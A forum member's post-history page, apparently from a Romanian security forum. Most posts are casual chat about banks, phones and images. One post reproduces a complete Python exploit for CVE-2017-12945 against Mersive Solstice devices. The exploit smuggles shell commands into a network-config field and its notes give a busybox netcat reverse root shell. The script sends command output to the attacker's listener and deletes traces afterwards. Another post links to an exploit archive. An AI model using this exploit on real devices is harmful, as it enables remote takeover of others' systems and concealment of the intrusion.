Jump to content

Vasile.

Active Members
  • Posts

    123
  • Joined

  • Days Won

    2

Everything posted by Vasile.

  1. Schimba fontul Tu vrei baza de date python in GUI
  2. Salut, imi poate decoda cineva telefon: Name: Nokia Lumia 610 Carrier: Vodafone SW variant ID227 v.20 Software: Windos * Phone 7.5 Codat pe reteaua Vodafone Italia Imei: priate message Ofer 10 euro transfer sms
  3. Cine are bani de cazare in hotel, nu cred ca are Miceosoft Office 2007 "Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows "
  4. Bun, stii cum pot afla locatia dispositivului "tată" de pe dispozitivul "mamă"? In caz ca "tata" e pierdut Dupe ip ceva, 10x
  5. Este pe cn.0day.today cea mai 9 veraiune, nu reusesc de pe tel Edit: CVE 2017-19245 https://cn.0day.today/exploit/33596
  6. # Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution # Google Dork: N/A # Date: 2016-12-23 # Exploit Author: Alexandre Teyar # Vendor Homepage: https://www2.mersive.com/ # Firmware Link: http://www.mersive.com/Support/Releases/SolsticeServer/SGE/Android/2.8.0/Solstice.apk # Versions: 2.8.0 # Tested On: Mersive Solstice 2.8.0 # CVE: CVE-2017-12945 # Description : This will exploit an (authenticated) blind OS command injection # vulnerability present in Solstice devices running versions # of the firmware prior to 2.8.4. # Notes : To get the the command output (in piped-mode), a netcat listener # (e.g. 'nc -lkvp <LPORT>') needs to be launched before # running the exploit. # To get an interactive root shell use the following syntax # 'python.exe .\CVE-2017-12945.py -pass <PASSWORD> # -rh <RHOST> -p "busybox nc <LHOST> <LPORT> # -e /system/bin/sh -i"'. #!/usr/bin/env python3 import argparse import logging import requests import sys import time def parse_args(): """ Parse and validate the command line supplied by users """ parser = argparse.ArgumentParser( description="Solstice Pod Blind Command Injection" ) parser.add_argument( "-d", "--debug", dest="loglevel", help="enable verbose debug mode", required=False, action="store_const", const=logging.DEBUG, default=logging.INFO ) parser.add_argument( "-lh", "--lhost", dest="lhost", help="the listening address", required=False, type=str ) parser.add_argument( "-lp", "--lport", dest="lport", help="the listening port - default 4444", required=False, default="4444", type=str ) parser.add_argument( "-p", "--payload", dest="payload", help="the command to execute", required=True, type=str ) parser.add_argument( "-pass", "--password", dest="password", help="the target administrator password", required=False, default="", type=str ) parser.add_argument( "-rh", "--rhost", dest="rhost", help="the target address", required=True, type=str ) return parser.parse_args() def main(): try: args = parse_args() lhost = args.lhost lport = args.lport password = args.password rhost = args.rhost logging.basicConfig( datefmt="%H:%M:%S", format="%(asctime)s: %(levelname)-8s %(message)s", handlers=[logging.StreamHandler()], level=args.loglevel ) # Redirect stdout and stderr to <FILE> # only when the exploit is launched in piped mode if lhost and lport: payload = args.payload + " > /data/local/tmp/rce.tmp 2>&1" logging.info( "attacker listening address: {}:{}".format(lhost, lport) ) else: payload = args.payload logging.info("solstice pod address: {}".format(rhost)) if password: logging.info( "solstice pod administrator password: {}".format(password) ) # Send the payload to be executed logging.info("sending the payload...") send_payload(rhost, password, payload) # Send the results of the payload execution to the attacker # using 'nc <LHOST> <LPORT> < <FILE>' then remove <FILE> if lhost and lport: payload = ( "busybox nc {} {} < /data/local/tmp/rce.tmp ".format( lhost, lport ) ) logging.info("retrieving the results...") send_payload(rhost, password, payload) # Erase exploitation traces payload = "rm -f /data/local/tmp/rce.tmp" logging.info("erasing exploitation traces...") send_payload(rhost, password, payload) except KeyboardInterrupt: logging.warning("'CTRL+C' pressed, exiting...") sys.exit(0) def send_payload(rhost, password, payload): URL = "http://{}/Config/service/saveData".format(rhost) headers = { "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest", "Referer": "http://{}/Config/config.html".format(rhost) } data = { "m_networkCuration": { "ethernet": { "dhcp": False, "staticIP": "; {}".format(payload), "gateway": "", "prefixLength": 24, "dns1": "", "dns2": "" } }, "password": "{}".format(password) } # Debugging using the BurpSuite # proxies = { # 'http': 'http://127.0.0.1:8080', # 'https': 'https://127.0.0.1:8080' # } try: logging.info("{}".format(payload)) response = requests.post( URL, headers=headers, # proxies=proxies, json=data ) logging.debug( "{}".format(response.json()) ) # Wait for the command to be executed time.sleep(2) except requests.exceptions.RequestException as ex: logging.error("{}".format(ex)) sys.exit(0) if __name__ == "__main__": main() Source: https://www.exploit-db.com/exploits/47722
  7. Vasile.

    Arhiva

    Mamă sa nu spui ca era acela uid0, il foloseam si eo Nologin mai ai?
  8. Ce model? Era in titlu, sorry Vezi pe aici, poate te ajuta https://www.e-camere.ro/articol/Probleme-cu-DVR-m-ul-Dahua-(Hacked)-qm--Se-rezolva-cu-un-upgrade-de-firmware/ Upgrade firmware
  9. Ete root-uri cate vrei Rrtfm 👹 din dragoste pentru diavola
  10. Pai si tineye ce-ti spune?
  11. Exista, ceva gen vrei cum jucam tetris pe vremuri? https://www.123rf.com/photo_97578553_cheerful-brunette-woman-in-sweater-showing-thumb-up-and-holding-credit-card-while-winks-and-looking-.html?vti=n6v0vxyj4qw458e0dk-1-24 Photoshop Apropo, poza e poza, imaginea e imagine, exprima-te corect sa inteleaga tot prostul, Diferenta este ca poza e imprimata, iar imaginea este digitala, un fel de analog si digital, stiice zic?
  12. Pm cu preț te rog
  13. Incearca la băncile din Elveția https://corporatefinanceinstitute.com/resources/careers/companies/banks-in-switzerland/
  14. Bun, multumesc, am sa trimit e-mail si la HCMR. Revenind la subiect sunt praf sucursalele, ai bani ii tii safe, nu la indieni
  15. Nu aveam pattern pe tel, numai cu uber cat m-am plimbat cu Monzo si Monese
  16. Ti-l blocheaza imediat, dar nu stau nH pe chat sa ii conving, majoritatea bancilor mari au suport 24/24, 7/7 in h-urile alea cat comunici pe ei in chat, se fac cumparaturi, in primul rand nu au limita Edit/ nu mananc cacat qoi, spun din propria experienta, tot salariul mi-a fost scamat, de catre ei
  17. Dude, nu stiu daca esti ironic sau nu, mi-am pierdut telefonul pe care erau instalate app, si nu au mai fost de gasit, le-am dat si nr de tel, La BRD, BCR, Halifax, Americanexpress, etc.. te duci cu ID-ul, suni la orice h din zi sau din noapte il blochezi, nu tre sa stai ore pe chat In al ii-lea rand nu au 2FA, trompetele astea de asa numite banci, cu sucursalele prin fundul curții Iii: scrie in watermark pe maps (C) 2019?
  18. Ti-l inchide man, revolut din cate stiu sunt afiliati cu monese, sunt 'banci' ambulate deschise de indieni in coltul strazii, am fost personal la adresa mentionata de ei in uk, nu era nimic, lucreaza de prin rulote Edit:// daca platesti taxe si impozite, nu faci spalari dde bani, exista bcr, bnr, etc, nu ai de ce sa te temi
  19. Incearca cu acte de student, oricum gasesti giveaway , il faci pe numele lu fitu si bagi NFC Edit:// vezi aici https://rstforums.com/forum/search/?q=Ratb
  20. Ramai fara bani, am avut la Monzo cateva miare de £, cand am incercat sa fac withdraw am ramas fara card, au sediile in apartemente confort 3.
×
×
  • Create New...